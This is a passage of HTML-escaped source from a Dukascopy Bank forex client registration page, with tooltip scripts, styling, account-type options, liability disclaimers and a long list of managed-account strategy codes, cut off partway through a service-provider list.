        this.sTip = sTip;
        this.hideTimeoutId = null;
        var oThis = this;

        this.show = function (event) {
            var oEvent = (event || window.event);
            if (oThis.hideTimeoutId) {
                window.clearTimeout(oThis.hideTimeoutId);
                return;
            } else if (oThis.oTipContainer.style.display == &quot;block&quot;) {
                return;
            }
            aSelects = document.getElementsByTagName(&apos;SELECT&apos;);
            for (i=0; i &lt; aSelects.length; i++)  {
                aSelects[i].style.visibility = &apos;hidden&apos;;
            }
            oThis.oTipContainer.style.top = oEvent.clientY - oThis.oTipContainer.offsetHeight - 2;
            oThis.oTipContainer.style.left = oEvent.clientX + 3;
            oThis.oTipContainer.style.display = &quot;block&quot;;
        }

        this.hide = function () {
            oThis.hideTimeoutId = null;
            oThis.oTipContainer.style.display = &quot;none&quot;;
            aSelects = document.getElementsByTagName(&apos;SELECT&apos;);
            for (i=0; i &lt; aSelects.length; i++)  {
                aSelects[i].style.visibility = &apos;&apos;;
            }
        }

        this.hideTimeouted = function () {
            oThis.hideTimeoutId = window.setTimeout(oThis.hide, oThis.hideDelay);
        }

        document.write(&apos;&lt;img src=&quot;../../images/icons/16x16/tip.png&quot; align=&quot;absmiddle&quot; height=&quot;16&quot; width=&quot;16&quot; border=&quot;0&quot; id=&quot;tipImg&apos; + tipIndex + &apos;&quot;/&gt;&apos;);
        document.write(&apos;&lt;div class=&quot;tip&quot; style=&quot;display:none;&quot; id=&quot;tipContainer&apos; + tipIndex + &apos;&quot;&gt;&apos; + sTip + &apos;&lt;/div&gt;&apos;);

        this.oTipImg = document.getElementById(&apos;tipImg&apos; + tipIndex);
        this.oTipContainer = document.getElementById(&apos;tipContainer&apos; + tipIndex);
        if (typeof(width) != &apos;undefined&apos;)
            this.oTipContainer.style.width = width;
        addEventHandler(this.oTipImg, &apos;mouseover&apos;, this.show);
        addEventHandler(this.oTipContainer, &apos;mouseover&apos;, this.show);
        addEventHandler(this.oTipImg, &apos;mouseout&apos;, this.hideTimeouted);
        addEventHandler(this.oTipContainer, &apos;mouseout&apos;, this.hideTimeouted);
        tipIndex++;
    }
    &lt;/script&gt;
    &lt;!--&lt;script src=&quot;js/lib.js&quot;&gt;&lt;/script&gt;
    &lt;script src=&quot;js/checkForm.js&quot;&gt;&lt;/script&gt;--&gt;
  &lt;style&gt;
  body, td, span, div, p, tr, th, option, font, button, input, select, textarea, b, i, a {
    font-size:8pt;
    font-family:Verdana;
  }
  table  {
   table-layout:fixed;
  }
  a  {
    font-weight:bold;
    text-decoration:underline;
    color:black;
  }

  a:hover  {
    color:#666666;
  }

  .header  {
    font-size:11pt;
    height:24px;
    color:#FFFFFF;
    font-weight:bold;
    text-align:center;
    background-image: url(&apos;https://www.dukascopy.com/swiss/inc/images/headline_bg_menu.gif&apos;);
    background-color:#000;
    background-position:0px 0px;
    background-repeat:repeat-x;
  }

  .header a  {
    color:#FFFFFF;
    font-weight:bold;
    text-decoration:none;
  }

  .header a:hover  {
    color:#FFFFFF;
    text-decoration:underline;
  }

  .subheader  {
    font-size:10pt;
    color:#333333;
    font-weight:bold;
    text-align:center;
    padding:5 0 0 0;
  }

 .subheader *  {
    font-size:10pt;
    font-weight:bold;
  }

  .step  {
    font-size:10pt;
    color:#999999;
    font-weight:bold;
    text-align:center;
    padding:5 0 5 0;
  }
  .error  {
    font-size:10pt;
    color:#EE0000;
    text-align:center;
    padding:5 0 5 0;
    font-weight:bold;
  }
  .title  {
    text-align:right;
    width:50%;
    padding:2 2 2 2;
    color:#1D4470;
  }
  .field  {
    text-align:left;
    width:50%;
    padding:2 22 2 2;
  }
  .buttons  {
    text-align:center;
    padding:4 4 4 4;
  }
  .button  {
    color:white;
    border:1px outset;
    cursor:pointer;
    background-color:#1D4470;
    width:100px;
    font-weight:bold;
    height:13pt;
  }
  .info  {
    text-align:center;
    padding-left:22;
    padding-right:22;
  }
  input.text  {
    width:100%;
    border-top:1px solid #cccccc;
    border-right:1px solid #cccccc;
    border-bottom:1px solid #cccccc;
    border-left:1px solid #cccccc;
  }
  input.checkbox {

  }
  textarea  {
    width:100%;
    border:1px solid #cccccc;
    font-size:8pt !important;
    font-weight:normal !important;
  }
  select {
    border:1px solid #cccccc;
  }

  .tip {
    position:absolute;
    border: 1px solid #333333;
    background-color: #FFFFE1;
    width: 250px;
    padding: 7px;
    text-align: justify;
    z-index:100;
  }

  &lt;/style&gt;
  &lt;/head&gt;
  &lt;body onLoad=&quot;init();&quot; onBeforeUnload=&quot;showWaiting();&quot; style=&quot;margin:0px;padding:0px;&quot;&gt;
  &lt;div style=&quot;background:url(&apos;https://www.dukascopy.com/pics/topBackground.png&apos;) repeat-x;&quot;&gt;&lt;img src=&quot;https://www.dukascopy.com/pics/headers/website_logo_bank.jpg&quot; alt=&quot;Dukascopy&quot; style=&quot;width:579px;height:103px;border:none;&quot;&gt;&lt;/div&gt;
  &lt;table width=&quot;100%&quot; align=&quot;center&quot; border=&quot;0&quot; cellpadding=&quot;0&quot; cellspacing=&quot;0&quot;&gt;
&lt;form style=&quot;margin:0px;padding:0px;&quot; name=&quot;mainForm&quot; action=&quot;/fo/register/live/index.php&quot; method=&quot;post&quot;&gt;
  &lt;tr&gt;
    &lt;td colspan=&quot;2&quot; class=&quot;header&quot;&gt;
      Client Registration
    &lt;/td&gt;
  &lt;/tr&gt;
  &lt;tr&gt;
    &lt;td colspan=&quot;2&quot; class=&quot;step&quot;&gt;
      Step 1 of 6-12
    &lt;/td&gt;
  &lt;/tr&gt;
  &lt;tr&gt;
    &lt;td colspan=&quot;2&quot;&gt;
      &lt;div class=&quot;error&quot; id=topError&gt;
      	      &lt;div&gt;
    &lt;/td&gt;
  &lt;/tr&gt;
  &lt;tr&gt;
    &lt;td class=&quot;title&quot; valign=&quot;top&quot;&gt;
      Date:
    &lt;/td&gt;
    &lt;td class=&quot;field&quot; valign=&quot;top&quot;&gt;
      Thu, 17 Mar 2011    &lt;/td&gt;
  &lt;/tr&gt;
  &lt;tr&gt;
    &lt;td class=&quot;title&quot; valign=&quot;top&quot;&gt;
      Status:
    &lt;/td&gt;
    &lt;script&gt;
    	function radioClickControll() {
    		var retAcc = document.getElementById(&apos;radio_accountKind_6&apos;);
    		var stAcc  = document.getElementById(&apos;radio_accountKind_7&apos;);
    		var rInd   = document.getElementById(&apos;radio_type_1&apos;);
    		var rJoint = document.getElementById(&apos;radio_type_3&apos;);
    		var rLegal = document.getElementById(&apos;radio_type_2&apos;);

    		if(retAcc.checked) {
    			rLegal.disabled = true;
    		}
    		if(stAcc.checked) {
    			rLegal.disabled = false;
    		}

    		if(rLegal.checked) {
    			retAcc.disabled = true;
    		} 
    		if(rInd.checked || rJoint.checked) { 
    			retAcc.disabled = false;
    		}

    		
    	}
    &lt;/script&gt;
    &lt;td class=&quot;field&quot; valign=&quot;top&quot;&gt;
      &lt;input type=&quot;hidden&quot; name=&quot;aData[STRAT_REF]&quot; value=&quot;-1&quot;&gt;
      &lt;input type=&quot;hidden&quot; name=&quot;aData[FEEDBACK_URL]&quot; value=&quot;-1&quot;&gt;
      &lt;input type=&quot;radio&quot; name=&quot;aData[TYPE]&quot; id=&quot;radio_type_1&quot; value=&quot;1&quot; checked onclick=&quot;radioClickControll()&quot;&gt; &lt;label for=&quot;radio_type_1&quot;&gt;For Individuals&lt;/label&gt;&lt;br/&gt;
      &lt;input type=&quot;radio&quot; name=&quot;aData[TYPE]&quot; id=&quot;radio_type_3&quot; value=&quot;3&quot; onclick=&quot;radioClickControll()&quot;&gt; &lt;label for=&quot;radio_type_3&quot;&gt;For Joint Account&lt;/label&gt;&lt;br/&gt;
      &lt;input type=&quot;radio&quot; name=&quot;aData[TYPE]&quot; id=&quot;radio_type_2&quot; value=&quot;2&quot; onclick=&quot;radioClickControll()&quot;&gt; &lt;label for=&quot;radio_type_2&quot;&gt;For Legal Entities&lt;/label&gt;
    &lt;/td&gt;
  &lt;/tr&gt;
  &lt;tr&gt;
    &lt;td class=&quot;title&quot; valign=&quot;top&quot;&gt;
      Kind of account:
    &lt;/td&gt;
    &lt;td class=&quot;field&quot; valign=&quot;top&quot;&gt;
      &lt;script&gt;
        function fSetManagedAccountStrategyMode(bShown)  {
          oInp = document.getElementById(&apos;sel_managedAccountStrategy&apos;);
          oInp.disabled = !bShown;
          oInp.style.display = (bShown?&quot;&quot;:&quot;none&quot;);
          if(bShown) {
          	document.getElementById(&apos;servProvider0&apos;).checked = false;
          }
        }
        
        function fSetServProviderMode(bShown)  {
          oInp = document.getElementById(&apos;sel_servProvider&apos;);
          oInp.disabled = !bShown;
          oInp.style.display = (bShown?&quot;&quot;:&quot;none&quot;);
          if(bShown) {
          	document.getElementById(&apos;extManContact0&apos;).checked = false;
          } 
        }
      &lt;/script&gt;
      &lt;table border=&quot;0&quot; cellpadding=&quot;1&quot; cellspacing=&quot;0&quot; style=&quot;table-layout:auto;&quot;&gt;
        &lt;tr&gt;
          &lt;td&gt;
            &lt;input type=&quot;radio&quot; name=&quot;aData[accountKind]&quot; value=&quot;&quot; style=display:none checked&gt;
            &lt;input type=&quot;radio&quot; name=&quot;aData[accountKind]&quot; value=&quot;6&quot; id=&quot;radio_accountKind_6&quot;  onClick=&quot;radioClickControll();fSetServProviderMode(false);fSetManagedAccountStrategyMode(false);&quot;&gt;
          &lt;/td&gt;
          &lt;td&gt;
            &lt;label for=&quot;radio_accountKind_6&quot;&gt;Retail Account&lt;/label&gt;
          &lt;/td&gt;
        &lt;/tr&gt;
        
        &lt;tr&gt;
          &lt;td&gt;
            &lt;input type=&quot;radio&quot; name=&quot;aData[accountKind]&quot; value=&quot;7&quot; id=&quot;radio_accountKind_7&quot;   onClick=&quot;radioClickControll();fSetServProviderMode(false);fSetManagedAccountStrategyMode(false);&quot;&gt;
          &lt;/td&gt;
          &lt;td&gt;
            &lt;label for=&quot;radio_accountKind_7&quot;&gt;Standard Account (from 50 000 USD)&lt;/label&gt;
          &lt;/td&gt;
        &lt;/tr&gt;
        
        &lt;tr&gt;
          &lt;td&gt;
            &lt;input type=&quot;radio&quot; name=&quot;aData[accountKind]&quot; value=&quot;100&quot; id=&quot;radio_accountKind_100&quot;  onClick=&quot;fSetServProviderMode(false);fSetManagedAccountStrategyMode(true);&quot;&gt;
          &lt;/td&gt;
          &lt;td&gt;
            &lt;label for=&quot;radio_accountKind_100&quot;&gt;Managed Account&lt;/label&gt;
          &lt;/td&gt;
        &lt;/tr&gt;
        &lt;tr&gt;
        &lt;td&gt;&lt;/td&gt;
          &lt;td valign=&quot;top&quot; id=&quot;sel_managedAccountStrategy&quot; style=&quot;display:none;&quot; disabled&gt;
			          
            &lt;b&gt;Whilst selecting your Manager/Attorney and for convenience purposes only you may use the pull-down menu. Dukascopy has not performed any competence verification or due diligence, does not issue any recommendation concerning your Manager/Attorney and can not be held liable for any losses, direct and indirect damages whether financial or not, resulting from your Manager/Attorney&amp;#039;s acts or omissions.&lt;/b&gt;&lt;br&gt;
            &lt;select name=&quot;aData[managedAccountStrategy]&quot; id=&quot;sel_mas&quot;&gt;
		      &lt;option value=&apos;1ABEM3&apos; &gt;&amp;nbsp;1ABEM3&lt;/option&gt;
&lt;option value=&apos;356JFH1&apos; &gt;&amp;nbsp;356JFH1&lt;/option&gt;
&lt;option value=&apos;356JFH2&apos; &gt;&amp;nbsp;356JFH2&lt;/option&gt;
&lt;option value=&apos;356JFH3&apos; &gt;&amp;nbsp;356JFH3&lt;/option&gt;
&lt;option value=&apos;356JFH4&apos; &gt;&amp;nbsp;356JFH4&lt;/option&gt;
&lt;option value=&apos;356JFH5&apos; &gt;&amp;nbsp;356JFH5&lt;/option&gt;
&lt;option value=&apos;3SFX1&apos; &gt;&amp;nbsp;3SFX1&lt;/option&gt;
&lt;option value=&apos;3SFX2&apos; &gt;&amp;nbsp;3SFX2&lt;/option&gt;
&lt;option value=&apos;45GHKLBV&apos; &gt;&amp;nbsp;45GHKLBV&lt;/option&gt;
&lt;option value=&apos;AADB88&apos; &gt;&amp;nbsp;AADB88&lt;/option&gt;
&lt;option value=&apos;ABBB22&apos; &gt;&amp;nbsp;ABBB22&lt;/option&gt;
&lt;option value=&apos;ABEF73&apos; &gt;&amp;nbsp;ABEF73&lt;/option&gt;
&lt;option value=&apos;AEAC86&apos; &gt;&amp;nbsp;AEAC86&lt;/option&gt;
&lt;option value=&apos;AECC31&apos; &gt;&amp;nbsp;AECC31&lt;/option&gt;
&lt;option value=&apos;ALPX&apos; &gt;&amp;nbsp;ALPX&lt;/option&gt;
&lt;option value=&apos;ALTV&apos; &gt;&amp;nbsp;ALTV&lt;/option&gt;
&lt;option value=&apos;ARCH&apos; &gt;&amp;nbsp;ARCH&lt;/option&gt;
&lt;option value=&apos;ARXX&apos; &gt;&amp;nbsp;ARXX&lt;/option&gt;
&lt;option value=&apos;AZAT681&apos; &gt;&amp;nbsp;AZAT681&lt;/option&gt;
&lt;option value=&apos;Augustan&apos; &gt;&amp;nbsp;Augustan&lt;/option&gt;
&lt;option value=&apos;BABC92&apos; &gt;&amp;nbsp;BABC92&lt;/option&gt;
&lt;option value=&apos;BADF84&apos; &gt;&amp;nbsp;BADF84&lt;/option&gt;
&lt;option value=&apos;BAYWM&apos; &gt;&amp;nbsp;BAYWM&lt;/option&gt;
&lt;option value=&apos;BCAD67&apos; &gt;&amp;nbsp;BCAD67&lt;/option&gt;
&lt;option value=&apos;BCBC72&apos; &gt;&amp;nbsp;BCBC72&lt;/option&gt;
&lt;option value=&apos;BCCA82&apos; &gt;&amp;nbsp;BCCA82&lt;/option&gt;
&lt;option value=&apos;BCEE55&apos; &gt;&amp;nbsp;BCEE55&lt;/option&gt;
&lt;option value=&apos;BDAD35&apos; &gt;&amp;nbsp;BDAD35&lt;/option&gt;
&lt;option value=&apos;BDCC70&apos; &gt;&amp;nbsp;BDCC70&lt;/option&gt;
&lt;option value=&apos;BDCP&apos; &gt;&amp;nbsp;BDCP&lt;/option&gt;
&lt;option value=&apos;BEAD70&apos; &gt;&amp;nbsp;BEAD70&lt;/option&gt;
&lt;option value=&apos;BEAF55&apos; &gt;&amp;nbsp;BEAF55&lt;/option&gt;
&lt;option value=&apos;BECF19&apos; &gt;&amp;nbsp;BECF19&lt;/option&gt;
&lt;option value=&apos;BEDD59&apos; &gt;&amp;nbsp;BEDD59&lt;/option&gt;
&lt;option value=&apos;BEEE43&apos; &gt;&amp;nbsp;BEEE43&lt;/option&gt;
&lt;option value=&apos;BRKIC&apos; &gt;&amp;nbsp;BRKIC&lt;/option&gt;
&lt;option value=&apos;BUSH&apos; &gt;&amp;nbsp;BUSH&lt;/option&gt;
&lt;option value=&apos;BUSH288&apos; &gt;&amp;nbsp;BUSH288&lt;/option&gt;
&lt;option value=&apos;CBFB47&apos; &gt;&amp;nbsp;CBFB47&lt;/option&gt;
&lt;option value=&apos;CCDE32&apos; &gt;&amp;nbsp;CCDE32&lt;/option&gt;
&lt;option value=&apos;CCPFX&apos; &gt;&amp;nbsp;CCPFX&lt;/option&gt;
&lt;option value=&apos;CDCD88&apos; &gt;&amp;nbsp;CDCD88&lt;/option&gt;
&lt;option value=&apos;CDFD34&apos; &gt;&amp;nbsp;CDFD34&lt;/option&gt;
&lt;option value=&apos;CEDD62&apos; &gt;&amp;nbsp;CEDD62&lt;/option&gt;
&lt;option value=&apos;CEFA67&apos; &gt;&amp;nbsp;CEFA67&lt;/option&gt;
&lt;option value=&apos;CEFF58&apos; &gt;&amp;nbsp;CEFF58&lt;/option&gt;
&lt;option value=&apos;CFEC46&apos; &gt;&amp;nbsp;CFEC46&lt;/option&gt;
&lt;option value=&apos;CFFX&apos; &gt;&amp;nbsp;CFFX&lt;/option&gt;
&lt;option value=&apos;CGFX&apos; &gt;&amp;nbsp;CGFX&lt;/option&gt;
&lt;option value=&apos;CHBC&apos; &gt;&amp;nbsp;CHBC&lt;/option&gt;
&lt;option value=&apos;CLMFX&apos; &gt;&amp;nbsp;CLMFX&lt;/option&gt;
&lt;option value=&apos;CurrClub&apos; &gt;&amp;nbsp;CurrClub&lt;/option&gt;
&lt;option value=&apos;DADD65&apos; &gt;&amp;nbsp;DADD65&lt;/option&gt;
&lt;option value=&apos;DBAA26&apos; &gt;&amp;nbsp;DBAA26&lt;/option&gt;
&lt;option value=&apos;DBAF77&apos; &gt;&amp;nbsp;DBAF77&lt;/option&gt;
&lt;option value=&apos;DBFB93&apos; &gt;&amp;nbsp;DBFB93&lt;/option&gt;
&lt;option value=&apos;DCCD84&apos; &gt;&amp;nbsp;DCCD84&lt;/option&gt;
&lt;option value=&apos;DCEC93&apos; &gt;&amp;nbsp;DCEC93&lt;/option&gt;
&lt;option value=&apos;DDBF26&apos; &gt;&amp;nbsp;DDBF26&lt;/option&gt;
&lt;option value=&apos;DDCC49&apos; &gt;&amp;nbsp;DDCC49&lt;/option&gt;
&lt;option value=&apos;DDDB32&apos; &gt;&amp;nbsp;DDDB32&lt;/option&gt;
&lt;option value=&apos;DEFD33&apos; &gt;&amp;nbsp;DEFD33&lt;/option&gt;
&lt;option value=&apos;DF56NB&apos; &gt;&amp;nbsp;DF56NB&lt;/option&gt;
&lt;option value=&apos;DF794J0&apos; &gt;&amp;nbsp;DF794J0&lt;/option&gt;
&lt;option value=&apos;DFAF50&apos; &gt;&amp;nbsp;DFAF50&lt;/option&gt;
&lt;option value=&apos;DG785&apos; &gt;&amp;nbsp;DG785&lt;/option&gt;
&lt;option value=&apos;DOXX&apos; &gt;&amp;nbsp;DOXX&lt;/option&gt;
&lt;option value=&apos;DRFX1&apos; &gt;&amp;nbsp;DRFX1&lt;/option&gt;
&lt;option value=&apos;DSBP&apos; &gt;&amp;nbsp;DSBP&lt;/option&gt;
&lt;option value=&apos;EACE93&apos; &gt;&amp;nbsp;EACE93&lt;/option&gt;
&lt;option value=&apos;EADA74&apos; &gt;&amp;nbsp;EADA74&lt;/option&gt;
&lt;option value=&apos;EAEE21&apos; &gt;&amp;nbsp;EAEE21&lt;/option&gt;
&lt;option value=&apos;EAFD36&apos; &gt;&amp;nbsp;EAFD36&lt;/option&gt;
&lt;option value=&apos;EBAD44&apos; &gt;&amp;nbsp;EBAD44&lt;/option&gt;
&lt;option value=&apos;EBBB34&apos; &gt;&amp;nbsp;EBBB34&lt;/option&gt;
&lt;option value=&apos;EBDE90&apos; &gt;&amp;nbsp;EBDE90&lt;/option&gt;
&lt;option value=&apos;ECURRENTZ&apos; &gt;&amp;nbsp;ECURRENTZ&lt;/option&gt;
&lt;option value=&apos;EDCC46&apos; &gt;&amp;nbsp;EDCC46&lt;/option&gt;
&lt;option value=&apos;EFAF70&apos; &gt;&amp;nbsp;EFAF70&lt;/option&gt;
&lt;option value=&apos;EFBB17&apos; &gt;&amp;nbsp;EFBB17&lt;/option&gt;
&lt;option value=&apos;EFCA50&apos; &gt;&amp;nbsp;EFCA50&lt;/option&gt;
&lt;option value=&apos;EFCA92&apos; &gt;&amp;nbsp;EFCA92&lt;/option&gt;
&lt;option value=&apos;FAAC62&apos; &gt;&amp;nbsp;FAAC62&lt;/option&gt;
&lt;option value=&apos;FBDB80&apos; &gt;&amp;nbsp;FBDB80&lt;/option&gt;
&lt;option value=&apos;FBDF30&apos; &gt;&amp;nbsp;FBDF30&lt;/option&gt;
&lt;option value=&apos;FBED79&apos; &gt;&amp;nbsp;FBED79&lt;/option&gt;
&lt;option value=&apos;FBFA65&apos; &gt;&amp;nbsp;FBFA65&lt;/option&gt;
&lt;option value=&apos;FCCA80&apos; &gt;&amp;nbsp;FCCA80&lt;/option&gt;
&lt;option value=&apos;FDAG&apos; &gt;&amp;nbsp;FDAG&lt;/option&gt;
&lt;option value=&apos;FEEC47&apos; &gt;&amp;nbsp;FEEC47&lt;/option&gt;
&lt;option value=&apos;FFFF98&apos; &gt;&amp;nbsp;FFFF98&lt;/option&gt;
&lt;option value=&apos;FGB1WFM&apos; &gt;&amp;nbsp;FGB1WFM&lt;/option&gt;
&lt;option value=&apos;FGH7GB&apos; &gt;&amp;nbsp;FGH7GB&lt;/option&gt;
&lt;option value=&apos;FGH90IK&apos; &gt;&amp;nbsp;FGH90IK&lt;/option&gt;
&lt;option value=&apos;FIBX1&apos; &gt;&amp;nbsp;FIBX1&lt;/option&gt;
&lt;option value=&apos;FORMA&apos; &gt;&amp;nbsp;FORMA&lt;/option&gt;
&lt;option value=&apos;FORT&apos; &gt;&amp;nbsp;FORT&lt;/option&gt;
&lt;option value=&apos;FRAPX&apos; &gt;&amp;nbsp;FRAPX&lt;/option&gt;
&lt;option value=&apos;FTAM&apos; &gt;&amp;nbsp;FTAM&lt;/option&gt;
&lt;option value=&apos;FXDASH1A&apos; &gt;&amp;nbsp;FXDASH1A&lt;/option&gt;
&lt;option value=&apos;FXG1&apos; &gt;&amp;nbsp;FXG1&lt;/option&gt;
&lt;option value=&apos;FXMN&apos; &gt;&amp;nbsp;FXMN&lt;/option&gt;
&lt;option value=&apos;FXPOR&apos; &gt;&amp;nbsp;FXPOR&lt;/option&gt;
&lt;option value=&apos;FXRGC&apos; &gt;&amp;nbsp;FXRGC&lt;/option&gt;
&lt;option value=&apos;G7NV&apos; &gt;&amp;nbsp;G7NV&lt;/option&gt;
&lt;option value=&apos;GHJKL76&apos; &gt;&amp;nbsp;GHJKL76&lt;/option&gt;
&lt;option value=&apos;GLCM&apos; &gt;&amp;nbsp;GLCM&lt;/option&gt;
&lt;option value=&apos;GSYE&apos; &gt;&amp;nbsp;GSYE&lt;/option&gt;
&lt;option value=&apos;GTG67H&apos; &gt;&amp;nbsp;GTG67H&lt;/option&gt;
&lt;option value=&apos;GTXX&apos; &gt;&amp;nbsp;GTXX&lt;/option&gt;
&lt;option value=&apos;HJH768&apos; &gt;&amp;nbsp;HJH768&lt;/option&gt;
&lt;option value=&apos;HKJBXF&apos; &gt;&amp;nbsp;HKJBXF&lt;/option&gt;
&lt;option value=&apos;HRAPX&apos; &gt;&amp;nbsp;HRAPX&lt;/option&gt;
&lt;option value=&apos;HUSK&apos; &gt;&amp;nbsp;HUSK&lt;/option&gt;
&lt;option value=&apos;IDTX&apos; &gt;&amp;nbsp;IDTX&lt;/option&gt;
&lt;option value=&apos;IDTX1&apos; &gt;&amp;nbsp;IDTX1&lt;/option&gt;
&lt;option value=&apos;IDTX2&apos; &gt;&amp;nbsp;IDTX2&lt;/option&gt;
&lt;option value=&apos;IDTX3&apos; &gt;&amp;nbsp;IDTX3&lt;/option&gt;
&lt;option value=&apos;INHH&apos; &gt;&amp;nbsp;INHH&lt;/option&gt;
&lt;option value=&apos;ITASCA&apos; &gt;&amp;nbsp;ITASCA&lt;/option&gt;
&lt;option value=&apos;JDCFX&apos; &gt;&amp;nbsp;JDCFX&lt;/option&gt;
&lt;option value=&apos;JLS&apos; &gt;&amp;nbsp;JLS&lt;/option&gt;
&lt;option value=&apos;JSDM&apos; &gt;&amp;nbsp;JSDM&lt;/option&gt;
&lt;option value=&apos;KRCM1&apos; &gt;&amp;nbsp;KRCM1&lt;/option&gt;
&lt;option value=&apos;KRCM2&apos; &gt;&amp;nbsp;KRCM2&lt;/option&gt;
&lt;option value=&apos;LBMFX&apos; &gt;&amp;nbsp;LBMFX&lt;/option&gt;
&lt;option value=&apos;LBXX2&apos; &gt;&amp;nbsp;LBXX2&lt;/option&gt;
&lt;option value=&apos;LMXX&apos; &gt;&amp;nbsp;LMXX&lt;/option&gt;
&lt;option value=&apos;LivIn&apos; &gt;&amp;nbsp;LivIn&lt;/option&gt;
&lt;option value=&apos;MASI&apos; &gt;&amp;nbsp;MASI&lt;/option&gt;
&lt;option value=&apos;MBCM&apos; &gt;&amp;nbsp;MBCM&lt;/option&gt;
&lt;option value=&apos;MBCO&apos; &gt;&amp;nbsp;MBCO&lt;/option&gt;
&lt;option value=&apos;MDLV&apos; &gt;&amp;nbsp;MDLV&lt;/option&gt;
&lt;option value=&apos;MEIDAO&apos; &gt;&amp;nbsp;MEIDAO&lt;/option&gt;
&lt;option value=&apos;NK71&apos; &gt;&amp;nbsp;NK71&lt;/option&gt;
&lt;option value=&apos;NKHFX&apos; &gt;&amp;nbsp;NKHFX&lt;/option&gt;
&lt;option value=&apos;OANFx5&apos; &gt;&amp;nbsp;OANFx5&lt;/option&gt;
&lt;option value=&apos;OANFx55&apos; &gt;&amp;nbsp;OANFx55&lt;/option&gt;
&lt;option value=&apos;OGFX&apos; &gt;&amp;nbsp;OGFX&lt;/option&gt;
&lt;option value=&apos;PAXX&apos; &gt;&amp;nbsp;PAXX&lt;/option&gt;
&lt;option value=&apos;PORFX&apos; &gt;&amp;nbsp;PORFX&lt;/option&gt;
&lt;option value=&apos;PRSP&apos; &gt;&amp;nbsp;PRSP&lt;/option&gt;
&lt;option value=&apos;PURK1&apos; &gt;&amp;nbsp;PURK1&lt;/option&gt;
&lt;option value=&apos;RGCSR&apos; &gt;&amp;nbsp;RGCSR&lt;/option&gt;
&lt;option value=&apos;RJPFX&apos; &gt;&amp;nbsp;RJPFX&lt;/option&gt;
&lt;option value=&apos;RMJ&apos; &gt;&amp;nbsp;RMJ&lt;/option&gt;
&lt;option value=&apos;RNKFX&apos; &gt;&amp;nbsp;RNKFX&lt;/option&gt;
&lt;option value=&apos;ROXX&apos; &gt;&amp;nbsp;ROXX&lt;/option&gt;
&lt;option value=&apos;RSFX&apos; &gt;&amp;nbsp;RSFX&lt;/option&gt;
&lt;option value=&apos;RUSLION&apos; &gt;&amp;nbsp;RUSLION&lt;/option&gt;
&lt;option value=&apos;Rio2016&apos; &gt;&amp;nbsp;Rio2016&lt;/option&gt;
&lt;option value=&apos;SARK&apos; &gt;&amp;nbsp;SARK&lt;/option&gt;
&lt;option value=&apos;SEP1&apos; &gt;&amp;nbsp;SEP1&lt;/option&gt;
&lt;option value=&apos;SKUSN&apos; &gt;&amp;nbsp;SKUSN&lt;/option&gt;
&lt;option value=&apos;SMXX&apos; &gt;&amp;nbsp;SMXX&lt;/option&gt;
&lt;option value=&apos;SOUK&apos; &gt;&amp;nbsp;SOUK&lt;/option&gt;
&lt;option value=&apos;SRVFX&apos; &gt;&amp;nbsp;SRVFX&lt;/option&gt;
&lt;option value=&apos;STAC&apos; &gt;&amp;nbsp;STAC&lt;/option&gt;
&lt;option value=&apos;STAR+&apos; &gt;&amp;nbsp;STAR+&lt;/option&gt;
&lt;option value=&apos;SVTL&apos; &gt;&amp;nbsp;SVTL&lt;/option&gt;
&lt;option value=&apos;TC4ET&apos; &gt;&amp;nbsp;TC4ET&lt;/option&gt;
&lt;option value=&apos;TFGINC&apos; &gt;&amp;nbsp;TFGINC&lt;/option&gt;
&lt;option value=&apos;VASCON1&apos; &gt;&amp;nbsp;VASCON1&lt;/option&gt;
&lt;option value=&apos;VASCON2&apos; &gt;&amp;nbsp;VASCON2&lt;/option&gt;
&lt;option value=&apos;VASCON3&apos; &gt;&amp;nbsp;VASCON3&lt;/option&gt;
&lt;option value=&apos;VFGL5112&apos; &gt;&amp;nbsp;VFGL5112&lt;/option&gt;
&lt;option value=&apos;VHGLNM678&apos; &gt;&amp;nbsp;VHGLNM678&lt;/option&gt;
&lt;option value=&apos;VKCS52&apos; &gt;&amp;nbsp;VKCS52&lt;/option&gt;
&lt;option value=&apos;VNG409CG&apos; &gt;&amp;nbsp;VNG409CG&lt;/option&gt;
&lt;option value=&apos;Vulov10&apos; &gt;&amp;nbsp;Vulov10&lt;/option&gt;
&lt;option value=&apos;W2WFX&apos; &gt;&amp;nbsp;W2WFX&lt;/option&gt;
&lt;option value=&apos;WDFX&apos; &gt;&amp;nbsp;WDFX&lt;/option&gt;
&lt;option value=&apos;WDFX2&apos; &gt;&amp;nbsp;WDFX2&lt;/option&gt;
&lt;option value=&apos;WDXX&apos; &gt;&amp;nbsp;WDXX&lt;/option&gt;
&lt;option value=&apos;XYWFX&apos; &gt;&amp;nbsp;XYWFX&lt;/option&gt;
  
            &lt;/select&gt;&lt;br&gt;
			&lt;p&gt;&lt;input type=&quot;checkbox&quot; name=&quot;aData[extManAnswer]&quot; value=&quot;Yes&quot; id=extManContact0&gt;&lt;label for=extManContact0&gt; - &lt;b&gt;I expressly confirm that the selection/appointment of the External Manager is my own initiative without any recommendation from Dukascopy Bank SA. I have proceeded to a due diligence on the External Manager and will keep Dukascopy Bank SA harmless and fully indemnified against any and all losses, direct and indirect damages whether financial or not, resulting from my External Manager&amp;#039;s acts or omissions.&lt;/b&gt;&lt;/label&gt;
			&lt;/p&gt;&lt;br&gt;
          &lt;/td&gt;
        &lt;/tr&gt;

        &lt;tr&gt;
          &lt;td&gt;
            &lt;input type=&quot;radio&quot; name=&quot;aData[accountKind]&quot; value=&quot;200&quot; id=&quot;radio_accountKind_200&quot;  onClick=&quot;fSetServProviderMode(true);fSetManagedAccountStrategyMode(false);&quot;&gt;
          &lt;/td&gt;
          &lt;td&gt;
            &lt;label for=&quot;radio_accountKind_200&quot;&gt;Service Provider&lt;/label&gt;
          &lt;/td&gt;
        &lt;/tr&gt;
        &lt;tr&gt;
        &lt;td&gt;&lt;/td&gt;
          &lt;td valign=&quot;top&quot; id=&quot;sel_servProvider&quot; style=&quot;display:none;&quot; disabled&gt;
			          
            &lt;b&gt;Whilst selecting your Service Provider and for convenience purposes only you may use the pull-down menu. Dukascopy has not performed any competence verification or due diligence, does not issue any recommendation concerning your Service Provider and can not be held liable for any losses, direct and indirect damages whether financial or not, resulting from your Service Provider&amp;#039;s acts or omissions.&lt;/b&gt;&lt;br&gt;
            &lt;select name=&quot;aData[serviceProvider]&quot; id=&quot;sel_mas2&quot;&gt;
		      &lt;option value=&apos;BBAC47&apos; &gt;&amp;nbsp;BBAC47&lt;/option&gt;
&lt;option value=&apos;BUSH1&apos; &gt;&amp;nbsp;BUSH1&lt;/option&gt;
